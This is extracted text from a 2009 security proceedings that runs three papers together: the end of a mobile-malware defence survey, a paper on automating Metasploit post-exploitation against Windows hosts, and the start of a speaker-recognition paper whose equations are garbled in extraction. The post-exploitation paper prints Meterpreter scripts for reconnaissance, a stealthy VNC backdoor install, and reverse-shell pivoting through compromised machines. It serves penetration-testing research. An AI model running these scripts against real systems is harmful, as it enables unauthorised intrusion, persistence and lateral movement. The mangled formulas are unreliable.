academic researchers. Most researchers designed their own artificial malware to evaluate their protection solution [1,7]. Existing research on mobile malware detection focuses on tailoring the traditional signature-based detection techniques to the resource-constrained computation environment on mobile phones. Bose et al. introduced a signature scheme that characters high-level program behaviors to reduce the cost of real time monitoring and signature comparison [1]. Cheng et al. [2] bypassed the resource limitations by presenting a firewall solution between cellular network and Internet to filter suspicious data stream. Except traditional signature-based malware detection, recent research also starts new attempts to prevent the threat of mobile malware. Zhang et al. [3] and Muthukumaran et al. [4] investigated the integrity measurement based malware prevention that enforces lightweight mandatory access control to prevent malicious program behaviors. The major challenge of this approach is to automatically define sound rules without involving considerable human labor. Kim et al. [7] and Liu et al. [8] examined power anomaly monitoring that detects mobile malware by observing the extra power consumption caused by malicious behaviors. The major obstacle for this technique is the difficulty in accurately quantifying and modeling power consumption for multitask mobile platforms. 2.3

Industrial Effort against Mobile Malware

The industrial effort against mobile malware mainly comes from anti-virus vendors and mobile OS providers. Most anti-virus vendors offer the mobile versions of their anti-virus software. We examined the latest specifications of mobile anti-virus software from ESET, F-Secure, Kaspersky, McAfee, Norton, and Trend Micro. The core technique used in these solutions is still traditional signature-based detection techniques that monitor execution traces and file accesses. For these products, the major challenges, besides the constrained resources of mobile phones, also come from social engineering, which may tempt users to skip the warning provided by anti-virus software. Once malware is launched, anti-virus software could be neutralized due to weak runtime privilege control on mobile systems. The efforts from mobile OS providers mainly focus on enhancing the privilege control of mobile OS. The privileges on latest Symbian OS are defined as capabilities of a program7. To access a certain capability, a program must be signed by a certificate that is authorized with the corresponding privilege. These capabilities allow the Symbian OS to control access by applications to the functionalities provided by the platform APIs. Mobile malware is not able to gain a high privilege as long as the high privilege certificate is not disclosed to malware developers. Some linux-based smart phone platforms such as MontaVista also provide similar privilege control mechanisms by incorporating miniaturized version of SELinux8 .

7 8

Symbian Signed, http://www.symbiansigned.com MontaVista, http://www.mvista.com

246

3 3.1

Q. Yan et al.

Potential Directions for Effective Malware Detection and Prevention on Mobile Phones Monitoring Power Consumption

Battery power consumption is one of the major limitations of mobile phones that limit the complexity of anti-malware solutions. It also brings the challenge for mobile malware as all critical behaviors for malware propagation such as accessing WiFi or Bluetooth consume significant battery power [7]. Any malicious behaviors caused by mobile malware also involve extra power consumption. Mobile malware cannot hide these malicious behaviors if the power consumption of normal behaviors can be accurately quantified. As one of the most coarse-grained features that characterize program behaviors, the cost of real time power consumption monitor is negligible [7,8]. These factors make power consumption monitoring a potential direction for effective malware detection. Figure 2 illustrates an example of mobile malware detection by monitoring power consumption. The preliminary works have been done for this direction. The first known research [9] in this direction is done by Jacoby and Davis [9]. They proposed a malware detection technique based on the assumption that greedy malwares keep repeating the power consuming behaviors like scanning adjacent Bluetooth devices. These repeating behaviors will result in certain dominant frequencies shown in frequency-domain data transformed from the collected time-domain data of power consumption. The malwares are identified from these certain dominant frequencies. Recent work by Kim et al. [7] proposed another detection technique by comparing the compressed sequences of the power consumption value in each time interval. Liu et al. [8] defined a user-centric power model to estimate the power consumption based on the number or the duration of the user actions, such as, the duration of Call, the number of SMS, and etc. Their work uses machine learning techniques to generate rules for malware detection. These works have shown that power anomaly is an effective indicator for suspicious activities on mobile phones. To identify the causes of these activities is still a challenge for power-based malware detection as the power consumption for normal behavior is yet to be accurately quantified. Another challenge is that existing mobile phones is not able to provide sufficient precision for power A power anomaly event caused by certain malware activities.

Fig. 2. Example of mobile malware detection by monitoring power consumption. The activities of mobile malware are detected based on power anomaly events.

Insights into Malware Detection and Prevention on Mobile Phones

247

consumption measurement without involving extra measuring devices like an oscilloscope. 3.2

Increasing Platform Diversity

Platform diversity that mainly represents as lack of standardized programming APIs was one of major obstacles for deploying applications on different mobile phone models. It also limits the scope of victim mobile phones for a certain mobile malware. It is very difficult if not impossible for a mobile malware to use a limited-size payload to infect a large number of mobile phones with completely different programming APIs. This platform diversity is decreasing with the population of smart phones as device manufacturers prefer to deploy only a few smart phone platforms for all their mobile phones to increase the usability and extensibility. The key idea to increase platform diversity of smart phone platform is to use a dual mode design for application execution and development. The diverse programming APIs that are specific to each individual mobile phone are used for application execution to prevent the intrusion of mobile malware. The standard programming APIs are used for the application development. During the installation, a user switch the mobile phone into a bridge phrase that maps the standard programming APIs to the diverse programming APIs. Without the confirmation of users, a mobile malware is not able to learn the mapping for the diverse programming APIs that are currently used in the mobile phone. Figure 3 demonstrates an example of dual mode design. Mode A for application development

API x at address Ax API y at address Ay ...

Mode B for application execution

USE

Application

USE

Ax != Bx, Ay != By, ...

API x at address Bx API y at address By ...

One way random mapping

Fig. 3. Example of dual mode design. The intrusion of mobile malware is prevented by self diversity after randomizing the programming APIs.

The major challenge for this approach is to secure the mapping information for legitimate applications and the bridge phrase that maps the standard programming APIs to the diverse programming APIs. The established mapping should be updated periodically, such as update the mapping during each mobile phone startup, to mitigate the threat that mobile malware learns the correcting mapping incidentally. 3.3

Enforcing Hardware Sandbox

Hardware capability limitation subject to manufacture cost was another major limitation that makes it difficult to extend the applications of mobile phones

248

Q. Yan et al.

1.“I am active.”

2. “Disable yourselves!”

Hardware Sandbox

Fig. 4. Example of hardware sandbox application. Real time wiretapping via Internet is prevented as all hardware modules required for Internet access are disabled during a phone call.

beyond telephony. It also suppresses the damage that can be caused by mobile malware. For example, the weak connectivity of traditional mobile phones makes that the best propagation methods for mobile malware were via Bluetooth and MMS. Although Internet is more attractive as it is necessary for mobile malware to propagate globally, the stable Internet access with sufficient bandwidth was not available. This is one of the major reasons that no large-scale outbreak has been observed until now. But these hardware capability limitations are being eliminated. More new hardware features such as WiFi and GPS have been integrated with the latest mobile phones. The key idea to mitigate the threat from hardware capability enhancement is to enforce hardware sandbox that controls the access to the hardware. This hardware access control should be enforced by hardware sandbox rather than software sandbox like Symbian Signed. It is because the prevailing social engineering attacks may tempt users to bypass the protection of software sandbox. This is driven by the fact that the majority of interesting applications on mobile phones is provided by third party software developers who usually do not provide the certificates to prove their legitimacy. Hardware sandbox is able to provide a baseline protection even when the whole software system has been compromised by mobile malware, which cannot be provided by software sandbox. The basic principle to design a hardware sandbox is to disable the dangerous hardware components when sensitive applications such as telephony are running. Figure 4 illustrates an example of using hardware sandbox to prevent real time wiretapping via Internet. The major challenge for hardware sandbox is to define flexible rules to guarantee the baseline protection while imposing minimal influence on normal usage of mobile phones. Disabling hardware components is not necessary if fine-grained access controls are available from hardware sandbox. Certain physical buttons on mobile phones can be used to switch among the protection levels to increase the usability of hardware sandbox. The remaining challenges are to provide an effective implementation and to securely store and update access control rules. These two challenges may be solved by incorporating a trusted platform module for mobile devices. However, such a hardware product is still not available until now [3].

Insights into Malware Detection and Prevention on Mobile Phones

4

249

Conclusion

In this paper, we investigated the impact of functionality limitations of mobile phones on the development of mobile malware. Through a survey on the stateof-art mobile malware, as well as the progress of academic research and the industrial effort against mobile malware, our study shows that the functionality limitations of mobile phones have a positive impact on suppressing the development of mobile malware. Based on this analysis, we proposed three potential directions for effective malware detection and prevention on mobile phones after considering these limitations as the advantages. The major challenges for these potential directions are identified in this work and more technical details will be provided in our future work.

References 1. Bose, A., Hu, X., Shin, K.G., Park, T.: Behavioral detection of malware on mobile handsets. In: Proceeding of the 6th international conference on Mobile systems, applications, and services, pp. 225–238 (2008) 2. Cheng, J., Wong, S.H., Yang, H., Lu, S.: Smartsiren: virus detection and alert for smartphones. In: Proceedings of the 5th international conference on Mobile systems, applications and services, pp. 258–271 (2007) 3. Zhang, X., Aciicmez, O., Seifert, J.P.: Building efficient integrity measurement and attestation for mobile phone platforms. In: Proceedings of the First International Conference on Security and Privacy in Mobile Information and Communication Systems (2009) 4. Muthukumaran, D., Sawani, A., Schiffman, J., Jung, B.M., Jaeger, T.: Measuring integrity on mobile phone systems. In: Proceedings of the 13th ACM symposium on Access control models and technologies, pp. 155–164 (2008) 5. Bose, A., Shin, K.G.: On mobile viruses exploiting messaging and bluetooth services. In: Securecomm and Workshops, pp. 1–10 (2006) 6. Hypponen, M.: State of cell phone malware in 2007. Invited talk at the 16th usenix security symposium, Boston (2007), http://www.usenix.org/events/sec07/tech/ 7. Kim, H., Smith, J., Shin, K.G.: Detecting energy-greedy anomalies and mobile malware variants. In: Proceeding of the 6th international conference on Mobile systems, applications, and services, pp. 239–252 (2008) 8. Liu, L., Yan, G., Zhang, X., Chen, S.: Virusmeter: Preventing your cellphone from spies. In: Proceedings of the 12th International Symposium On Recent Advances In Intrusion Detection (2009) 9. Jacoby, G., Davis, N.: Battery-based intrusion detection. In: Proceedings of the Global Telecommunications Conference (2004)

Automation of Post-exploitation (Focused on MS-Windows Targets) Mohammad Tabatabai Irani and Edgar R. Weippl Secure Business Austria, Favoritenstr. 16, A-1040 Vienna, Austria {mtabatabai,eweippl}@securityresearch.at http://www.sba-research.org

Abstract. Pentesting is becoming an important activity even for smaller companies. One of the most important economic pressures is the cost of such tests. In order to automate pentests, tools such as Metasploit can be used. Post-exploitation activities can, however, not be automated easily. Our contribution is to extend Meterpreter-scripts so that post-exploitation can be scripted. Moreover, using a multi-step approach (pivoting), we can automatically exploit machines that are not directly routable: Once the first machine is exploited, the script continues to then automatically launch an attack on the next machine, etc. Keywords: Pentesting, security, exploits.

1

Introduction

On the second Tuesday of each month Microsoft releases the security patches. Attackers are waiting to start reverse engineering on these patches to find out the original vulnerabilities. If an attacker can find the original vulnerability and write an exploit in limited time before systems get patched, then she can start kind of zero-day attack1 . Assuming that the attacker successes to write an exploit in this limited time, she requires automating the post exploit activities to save time for some time consuming post exploit activities like password cracking. In some cases an attacker has to perform a blind attack against a large number of targets. In this case the attacker will perform a fully automated exploitation and post exploitation in order to gather as much data as possible. The purpose of this kind of attack is to take over as many systems as possible. In comparison, pre-exploit and exploit phases can be automated easily by an attacker because theses phases are active on her side. She can control when and how to perform foot printing, scanning for vulnerabilities and when to start exploiting. After a successful exploitation the attacker probably has a shell of the remote machine but the attacker is required to perform the desired tasks manually. 1

This is not exactly a zero day attack. Zero day attack means the patch is not released by the vendor, but in this case the patch is released and the attacker is taking the advantage of a time gap between patch release and update of systems.

´ ezak et al. (Eds.): SecTech 2009, CCIS 58, pp. 250–257, 2009. D. Sl  c Springer-Verlag Berlin Heidelberg 2009 

Automation of Post-exploitation

251

Windows has some scripting features such as batch files and the Windows Script Host (WSH) which supports both VBScript and JScripts. Also some builtin tools with automation feature such as WMIC and NETSH are available and can help an attacker to automate her activities. For all these cases the attacker requires transferring her scripts and tools manually to target and scheduling them to be executed. Additionally this approach is not a stealth approach because of limits which usual payloads have.

2

Limits of Usual Payloads

In case of using usual payloads like a remote shell, for each post exploit task an additional process will be generated and this process is visible in processes list of the exploited machine. These processes will be shown on process list usually with SYSTEM privilege which is risky because there are only certain tasks which require being executed with SYSTEM privilege and if for instance a process such as cmd.exe is being executed with security context of SYSTEM, each administrator will notice that the machine has been compromised. With rootkits it is possible to hide some of these activities but transferring and installing a rootkit is not always possible and also has its own limits. If the attacker has a limited payload which could execute only a simple or a specific command, the entire post exploit activities will become a time consuming phase. In such a case the attacker requires transferring an advanced remote shell program or kind of backdoor to target, otherwise it is not possible to perform most of the post exploit activities. Moreover, some exploits can only be executed once.

3

Metasploit and Meterpreter

Metasploit [Met] is an open source framework for penetration testers to develop exploits, payloads and tools for penetration testing [MMC+ 07]. The product has about 270 exploits and 120 payloads for covering the initial needs of penetration testers. As the framework is open source, developers are contributing and preparing more and more exploits, payloads and tools based on the framework. The metasploit framework has different types of interfaces such as console and web interface (as GUI) and a simple command line interface such as msfcli. Additionally it is possible to generate standalone payloads with msfpayload which is important for targets which are fully patched. One of the unique payloads of Metasploit is Meterpreter. In order to solve all of the mentioned problems regarding to usual payloads, the metasploit developers have prepared an advanced payload which has solved all these problems. Meterpreter (abbreviation of Meta-Interpreter) is the solution for the mentioned problems which is available in metasploit standard package next to all other payloads and the attacker or penetration tester can use it just such as all other payloads. Meterpreter is based on a technique which is called DLL injection

252

M.T. Irani and E.R. Weippl

[Rem]. By applying this technique the developers of Meterpreter has developed the most stealth payload which can remain hidden from antivirus programs and will not be shown in processes list of the exploited machine. Meterpreter has many of the required post exploit activities as built-in functions and these builtin functions can fully cover the initial needs of an attacker. The attacker could extend the number of these built-in functions by extensions which can be implemented for special purposes. Additionally meterpreter is able to run scripts for automation purposes. As mentioned before the Meterpreter payload uses remote-in-memory DLLinjection and as a result it is not easy for antivirus programs to identify such an attack. In cases that the target machine is not exploitable the attacker requires to use a standalone instance of meterpreter pretending that it is a useful file. According to an analysis by Mark Bagger [Bag08] which has tested standalone meterpreter instances by more than 30 antiviruses and surprisely only a few number of them have classified the standalone instance of meterpreter as a security risk.

4

Practical Part

One of the most essential tasks in post exploit activities is automating post exploit activities as much as possible. Automatically exploitation is possible because it is an attacker-side activity. The attacker can automate all activities including identifying possible exploits and performing exploits against the targets. However, as post exploit activities are client-side (victim-side) activities, it should be automated and scripted on client side. This limitation is the reason why an attacker is not able to perform the post exploit activities automatically by usual payloads. By applying meterpreter it is possible to solve this problem and by using Metasploit APIs it is possible to fully script a session including post exploit activities. Since post exploitation is not a static activity, depending on the requirements the attacker can implement her own scripts. In following subsections some samples will be shown in order to illustrate the logic of our scripts. 4.1

Metasploit Programming APIs

At the most basic level there are REX libraries which stands for Ruby Extension Library. REX contains a series of classes and modules such as socket subsystem, protocols, logging systems and exploitation classes. It is possible to use REX directly in Ruby scripts and for this purpose the ruby script should require the rex library. The framework has two main parts and they are Framework core and Framework base. Framework core is a set of classes which are responsible for dealing with exploit modules, sessions and plugins. It is an interface to modules and plugins. Using the framework is an instance-based approach. It means a developer can create an instance of framework and then start working with it: myFramework = Msf::Framework.new This approach lets the developer to have as much

Automation of Post-exploitation

253

as instances of framework concurrently without facing any limitation. In order to use a framework instance in a ruby script, the ruby script should require msf/core. The Framework core is extended by Framework base which is the other part of the framework. The framework base is there to simplify working with Framework core and has additional classes such as serializing. Another purpose of framework base is providing classes for third party tools development. The framework base is extended by Framework UI which provides different interfaces for Metasploit such as command line, console, or web interface. The framework UI classes are used to encapsulate the data for different interfaces and they also make it possible the framework to work and interact with third party tools. 4.2

Implementing a Standalone Instance

In order to implement some post exploit scripts, a standalone instance of frame work is used. This standalone instance reads an input file which is the configuration file: ./postExploitScript.rb configFile.ext The postExploitScript.rb is a ruby script which uses Metasploit APIs as mentioned before by requiring rex,msf/base and msf/ui classes. The structure is modular and the script simply reads the input config file and initializes the script. In the simplest case the script will be used to perform a post exploit action against a single remote machine. In this case the config file would be something such as: 1: 2: 3: 4: 5:

IP address of first machine: x.y.z.y exploit to be used for the remote machine payload to be used for the remote machine degree of stealthiness: 1,2 or 3 type of hash gathering: 1 or 2

A sample config file with pivoting functionality would be something like: <exploit to be used for the first machine> <payload to be used for the first machine: windows/meterpreter/bind_tcp> <degree of stealthiness: 1,2 or 3> # the following line could be repeated for all remote machines i=1...n <exploit of remote machine i> <payload of remote machine i: windows/meterpreter/reverse_tcp> <degree of stealthiness machine i> ...

The structure of standalone script (that is postExploitScript.rb) is simple and contains the following parts: – Initializing the script including initializing the path, requiring the required libraries such as rex, msf/base and msf/ui and checking the availability of a given config file. Additionally the public IP address and the listener port, in case of using a reverse payload would be set.

254

M.T. Irani and E.R. Weippl

– Reading the config file and checking if the config file has a valid format. After that the script will initialize related variables such as the array of targets, exploits and payloads and the degree of stealthiness. Setting the pivoting flag will be performed in this section as well. – Generating a list of scripts is another part of the standalone script. In this part all available scripts in the related folder (/scripts/meterpreter/) will be scanned and saved in an array. The scripts have to follow a valid naming convention and that is each script should end with either 1, 2 or 3 which shows the stealthiness degree of the script. The standalone script will automatically generate arrays of each degree and saves the scripts in the array. This approach offers flexibility and there is no need to change the standalone script if some additional scripts would be added in future. – Executing the first exploit is the next part of script. If the config file has been configured for pivoting then each additional machine will be exploited and in case of a successful exploitation the PostExploitMe part will be called for each target. – The PostExploitMe part is the engine of the standalone script for performing post exploit activities. This part is responsible for performing the post exploit activities on exploited machines considering the predefined degree of stealthiness. 4.3

Implementing Post-exploit Scripts

The standalone script is an instance of the metasploit framework with required configuration including the target address, exploit and payload. The post exploit part of the standalone script requires scripts for each post exploit activity. This post exploit scripts can be executed either directly in a meterpreter session or can be called by the post exploit part of the standalone script. In order to fully automate a post exploit scenario the scripts are called by the standalone script, but the results are exactly the same to when the scripts are run manually from a meterpreter session in a msfconsole. As mentioned before there are three degrees of stealthiness which could be defined in configuration file. As a result for each post exploit activity it is possible to implement up to three versions of scripts. For instance, system information gathering can be implemented as follows: 1. Using only Metasploit APIs which return a limited amount of information: client.sys.config.sysinfo() 2. Using additionally native commands of windows which return more information: client.sys.process.execute (’cmd.exe’,’/c systeminfo && set && ver && fsutil fsinfo drives && net user && net localgroup’, ’Channelized’=>true)

In this case an additional cmd.exe process is created for a short period of time and can return much detailed information about the exploited machine.

Automation of Post-exploitation

255

3. Using additional tools. In this case third party tools or additional tools of windows such as WMIC could be used: client.sys.process.execute(’cmd.exe’,’/c wmic /output:wmic_sysinfo.txt /interactive:off CPU list brief /format:csv’,’Channelized’=>false) sleep(15) print_status("BIOS part...") client.sys.process.execute(’cmd.exe’,’/c wmic /append:wmic_sysinfo.txt /interactive:off bios list brief/format:csv’,’Channelized’=>false) sleep(3) print_status("OS part...") client.sys.process.execute(’cmd.exe’,’/c wmic /append:wmic_sysinfo.txt /interactive:off os list brief/format:csv’,’Channelized’=>false) sleep(3) print_status("ComputerSystem part...") client.sys.process.execute(’cmd.exe’,’/c wmic /append:wmic_sysinfo.txt /interactive:off computersystem list brief/format:csv’,’Channelized’=>false) sleep(3)

Process Information. Another important example of post exploit activity is identifying which processes (and that is equal to which programs and applications) are running. This helps an attacker to have a better understanding about the exploited machine. For instance if a DNS.exe process is available in the list of processes means that the exploited machine is a DNS server. For this purpose there are also three types of scripts implemented: – Using only Metasploit APIs (process 1.rb): myArray=client.sys.process. get_processes() This script will return a list of processes and the script will save the results in a XML file. – Using native commands (process 2.rb): client.sys.process.execute (’cmd.exe’,’/c net start && sc query && tasklist /v && tasklist && tasklist /m’, ’Channelized’=>true)

This item will return a full list of information regarding to processes and services. – Using additional tools (process 3.rb): By using WMIC it is possible to query about the most accurate information regarding the services and processes: print_status("wmic_process part...") client.sys.process.execute(’cmd.exe’,’/c wmic /output:wmic_service.txt /interactive:off process list brief /format:csv’,’Channelized’=>false) sleep(15) print_status("wmic_service part...") client.sys.process.execute(’cmd.exe’,’/c wmic /append:wmic_service.txt /interactive:off service list config /format:csv’,’Channelized’=>false) sleep(3)

It is possible to implement many sorts of these scripts for different purposes based on Metasploit APIs or windows internal tools. Additionally it is possible to use other third parties tools for much mor specific post exploit activities. For instance installing a VNC server or scanning a network from an exploited machine by Nmap or similar tools.

256

M.T. Irani and E.R. Weippl

Installing VNC Server. In order to install VNC, a light version of VNC is required. For this purpose the VNC of http://guh.nu/projects/vnc/ could be used which is a real light version and can be installed in a stealthy mode. The script has to transfer the following essential files to a temporary directory on target: (1) omnithread rt.dll, (2) VNCHooks.dll, (3) WinVNC.exe, and (4) vnc.reg. Installation of this version of VNC is simple and could be something like: #!/usr/bin/ruby # Installing a VNC server on target print_status("Installing VNC server") sysInfos=client.sys.config.sysinfo() os=sysInfos[’OS’] hostname=sysInfos[’Computer’] print_status("uploading the required files...") client.fs.file.upload_file("omnithread_rt.dll", "myUploads/vnc/omnithread_rt.dll") client.fs.file.upload_file("WinVNC.exe","myUploads/vnc/WinVNC.exe") client.fs.file.upload_file("VNCHooks.dll","myUploads/vnc/VNCHooks.dll") client.fs.file.upload_file("vnc.reg","myUploads/vnc/vnc.reg") print_status("registering the VNC in registry...") client.sys.process.execute(’cmd.exe’,’/c regedit -s vnc.reg’, ’Channelized’=>false) sleep(2) print_status("installing the VNC...") client.sys.process.execute(’cmd.exe’,’/c WinVNC -install’, ’Channelized’=>false) sleep(5) print_status("starting the VNC...") client.sys.process.execute(’cmd.exe’, ’/c net start "VNC server" && winvnc’,’Channelized’=>false) puts ("Installed!")

After installation the required services will be generated and they will have a start up status of automatic. The attacker can use a web interface to interact with console of the exploited machine. It is obvious that the exploited machine should be directly routable from the attacker’s host. Automatically Scanning By Nmap. For automatically scanning purposes in a post-exploit script the Nmap is a good choice because it is powerful by having different pinging techniques, fully supporting command line interface, is able to be scripted and its reputation among security researchers. As the scanning script requires the nmap tool, so it is a script of type 3. The script performs the following tasks on the exploited machine: – – – –

Finding the IP configuration of each NIC. Calculating the length of network portion from given subnet. Calculating the network address of related subnet. Transferring the required Nmap files and the file which contains the network addresses. – Performing a fast scan against the whole network or any type which the attacker is required.

Automation of Post-exploitation

4.4

257

Integration of Pivoting

As mentioned before in some cases it is not possible to directly reach a target and in order to exploit such a target another machine has to be exploited first and by performing pivoting on such an exploited machine it is then possible to start exploiting other machines which are not directly reachable. The standalone script is able to cover this requirement. The config file should contain more than 5 lines (the first 5 lines are the settings for the first machine). Each additional 5 lines indicate another machine which should be exploited via the first machine. The method which has been used for pivoting is port forwarding feature of Meterpreter payload (The following code is using an exploit which uses TCP port 135 but the original script finds the port dynamically): ’Payload’ ’OptionStr’

=> ’windows/meterpreter/reverse_tcp’, => ’RHOST=127.0.0.1 RPORT=135 LHOST=’+MyPublicAddress+’ LPORT=’+MyTcpPort.to_s,

The payload is a reverse shell and after exploiting the remote machine will connect back to the attacker’s host. The attacker requires defining a port forwarder to be able to communicate back with the remote machine: myStr=’portfwd add -L 127.0.0.1 -l 135 -r ’+$myTarget[i+1].to_s+’ -p 135’ puts myStr portFwdResult = $session[0].run_cmd(myStr)

5

Conclusion

In this paper we have shown how Metasploit can be used to automate postexploitation. Using the scripts presented targets can be attacked that are not directly routable. This mechanism of pivoting allows using a system that has been exploited to serve as a base for the next attack, leading to a cascade of exploited hosts. The final target host can then communicate to the attacker through reverse communication. Systems that are secured with multiple layers such as [EPW04] can then also be attacked.

References [Bag08] [EPW04]

[Met] [MMC+ 07] [Rem]

Bagget, M.: Effectiveness of antivirus in detecting metasploit payloads. SANS Institute (2008) Essmayr, W., Probst, S., Weippl, E.: Role-based access controls: Status, dissemination, and prospects for generic security mechanisms. Electronic Commerce Research (2004) Metasploit, http://www.metasploit.com/ Maynor, D., Mookhey, K.K., Cervini, J., Roslan, F., Beaver, K.: Metasploit Toolkit For Penetration Testing. SYNGRESS Press (2007) Remote, http://www.nologin.org/downloads/papers/ remote-library-injection.pdf

Speaker Dependent Frequency Cepstrum Coefficients Filip Orság Faculty of Information Technology, Bozetechova 2, 612 66 Brno, Czech Republic [email protected]

Abstract. This paper aims at speaker recognition based upon a novel set of features. Feature extraction is a crucial phase of the speaker recognition process and a proper feature set can influence it dramatically. Many well-known features are not suitable for the speaker recognition as those merge the specifics of the individual voices to make them universal. Therefore, we need features accentuating the individual differences of our voices to be able to recognise speakers reliably. This paper introduces Speaker Dependent Frequency Cepstrum Coefficients (SDFCC) intended for the speaker recognition purposes only. Experimental results prove increase of the reliability in comparison to the well-known features. According to the test results, the SDFCC are very useful and promising for the speaker recognition. Keywords: speaker, recognition, verification, identification, features.

1 Introduction Person identification or verification based on the speaker recognition is one of the most exciting technologies in biometry. This is mainly due to the fact voice is one of the most natural forms of identification for men. Speaker recognition is divided in two main groups: speaker identification and speaker verification. The process of the speaker identification answers a question “Who is speaking?” On the other hand, the speaker verification answers a question “Is the one, who is speaking, really the one, who are they claiming to be?” Thus, in case of the speaker identification we are trying to find owner of an unknown voice among many other known voices and in case of the speaker verification, we would like to determine similarity of an unknown voice to a known voice (e.g. stored in a database). The ways to compare two voices are many. However, in almost all of them we have to extract some specific features to be able to compare them. In the following chapter, there is described a new set of features designed specifically for a voicebased person identification or verification.

2 Speaker Dependent Features Speaker dependent features are speaker recognition oriented features. These features emphasise speaker individuality and are not usable for other purposes than the speaker recognition itself. These features are based on the algorithm used to calculate D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 258–264, 2009. © Springer-Verlag Berlin Heidelberg 2009

Speaker Dependent Frequency Cepstrum Coefficients

259

the well-known Mel-Frequency Cepstrum Coefficients (MFCC [1]). The main difference lies in the design of the filter bank. 2.1 Filter Design For the purpose of the speaker recognition, a triangular filter was chosen. The filter is a frequency domain filter applied to a discrete frequency spectrum of a signal. Suppose length of the discrete frequency spectrum to be N samples, which implies the original signal to be 2N samples long. The following filter is defined in the discrete frequency domain. Consider 0 ≤ f low ≤ 0.5 ⋅ Fs is a frequency in the frequency domain, FS is the sampling frequency and N is length of the signal. Then, it corresponds to the discrete frequency of Flow = f low ⋅ ( N ⋅ Fs )−1 . The triangular filter is defined in the discrete frequency domain by three basic frequencies 0 ≤ Flow < Fcentre < Fhigh < N , amplitude A and length of the filter, which

equals N samples. ⎧0, ⎪ k − Flow , ⎪A ⋅ F centre − Flow ⎪ H Triang (k , Flow , Fcentre , Fhigh ) = ⎨ ⎛ k + Fcentre ⎞⎟ ⎪ A ⋅ ⎜1 − , ⎜ ⎟ F ⎪ ⎝ high − Fcentre ⎠ ⎪0, ⎩

k = 0,1,…, Flow − 1 k = Flow , Flow + 1,…, Fcentre , k = Fcentre + 1, Fcentre + 2,…, Fhigh

(1)

k = Fhigh + 1, Fhigh + 2,…, N − 1

where k = 0,1,…, N − 1 is a discrete frequency, 0 ≤ Flow < Fcentre < Fhigh < N are basic filter frequencies, A denotes amplitude of the filter, and the length of the filter is N samples. 2.2 Speaker Dependent Frequency Filter Bank

Speaker Dependent Frequency Filter Bank (SDFFB) is a new approach to the filter bank definition. It is based on an average long-term Linear Prediction Coding (LPC) spectrum [2]. The SDFFB is much like the mel-frequency based bank of triangular filters [3], but the SDFFB differs from the mel-frequency based filter bank in distribution of the filter centres, in amplitude of the filters, and in the shape of the filters. Basic idea results from the dissimilarity of human vocal tracts. Shapes of the vocal tracts differ obviously in some important details. Model of the vocal tract can be calculated mathematically [4]. When a speech is being recognised, it is useful to extract features, which are speaker independent. This does not hold true in case of the speaker recognition. In this case, it is necessary to extract speaker dependent features. A normalised spectrum (see Fig. 1, left) can be used for the purposes of speaker recognition. The maxima and the minima in the spectrum become central frequencies Fcentre of the individual filters in terms of the previous filter definitions. First, we define an ordered set of the maxima and minima. For the design of the filter I decided to use the first eight extremes [10]. We put all the extremes in an ordered set:

260

F. Orság

{

}

F (i ) = f 0max , f1min , … , f Lmax , f Lmin +1 , i = 0,1, … , I + 1 ,

(2)

where f l max is the position of the lth maximum and f l min is the position of the lth minimum, I = 2L is total number of the filters in the filter bank. You can see that there is one maximum at the position i = 0 and one minimum at the position l = L + 1 . This is because of the algorithm properties. Given the set F (i ) of 2L + 2 frequencies, we can define the filter bank itself. The filter bank consists of I = 16 filters, hence we need at least L = 8 extremes plus one more maximum and one more minimum. It was experimentally proved, that the number of the extremes is even higher than 8 (it was approximately 11 – 12 extremes). Generally, the filter bank is defined as H SDFB (i, k ) = H Triang (k , F (i − 1), F (i ), F (i + 1)), i = 1,2, … , I ,

(

(3)

)

where I is total number of filters H Triang k , Flow , Fcentre , Fhigh , k is a discrete frequency k = 0,1, …, N − 1 and N is length of the signal. In the previous triangular filter definition, amplitude A appeared there. Two types of the Speaker Dependent Frequency Filter Banks were proposed – type I and type II. The Speaker Dependent Frequency Filter Bank of the type I (SDFFB-I) assumes the amplitude A = 1 . We call this type filter bank constant amplitude filter bank. The SDFFB of the type II (SDFFB-II) assumes the amplitudes of the individual filters equal to the values of the long-term LPC spectrum at the positions of Fcentre . We call this type of the filter bank variable amplitude filter bank (see Fig. 1, right).

Fig. 1. Left - LPC spectrum and normalized LPC spectrum (solid line - the original LPC spectrum, dotted line - the normalized LPC spectrum). Right - Triangular filter bank of type II.

2.3 Speaker Dependent Frequency Cepstrum Coefficients

The Speaker Dependent Frequency Cepstrum Coefficients (SDFCC) are much like the mel-frequency cepstrum coefficients in terms of the algorithm used for their calculation. Nevertheless, there is an essential difference between both of them. It differs in the filter bank used for the computation of the coefficients. The SDFCC are computed using the Speaker Dependent Frequency Filter Bank described in the previous chapter. The process of the calculation of the SDFCC is same as in the case of the MFCC. The first difference is in the use of a speaker dependent filter bank H SDFB (i, k ) given

Speaker Dependent Frequency Cepstrum Coefficients

261

by the Eq. 6. Then, we can express the log-energy at the output of the speaker dependent filters as

⎛ N −1 2⎞ C SDFB (i ) = ln⎜ H SDF (i, k ) ⋅ S (k ) ⎟, i = 1,2, … , I , ⎜ ⎟ ⎝ k =0 ⎠

∑

(4)

where I is total number of the filters in the filter bank, S (k ) is the Fast Fourier Transform (FFT [3]) of the signal s(n) , which is N samples long. We use the new coefficients C SDFB (i ) to calculate the SDFCC using the following equation: c SDFB ( j ) =

I −1

⎛

∑ C SDFB (i )⋅ cos⎜⎝ πn i =0

i −1 ⎞ ⎟, 2I ⎠

j = 0,1, … , I ,

(5)

Although the SDFCCs are computed the same way as the MFCCs, they are not same at all. The difference in the filter banks and filter shapes issues in very different results in case of the speaker recognition. The SDFCC cannot be used in universal speech recognition systems, since it emphasise the speaker influence too much. However, it could be used in a speech recognition system or in a speech recognition system oriented to one user. There can be some fields of application of such systems. It could be a 2-in-1 system, in which you can command a device using your voice and, at the same time, protect it using your voice. The device is being protected because it would not recognise spoken commands given by another user.

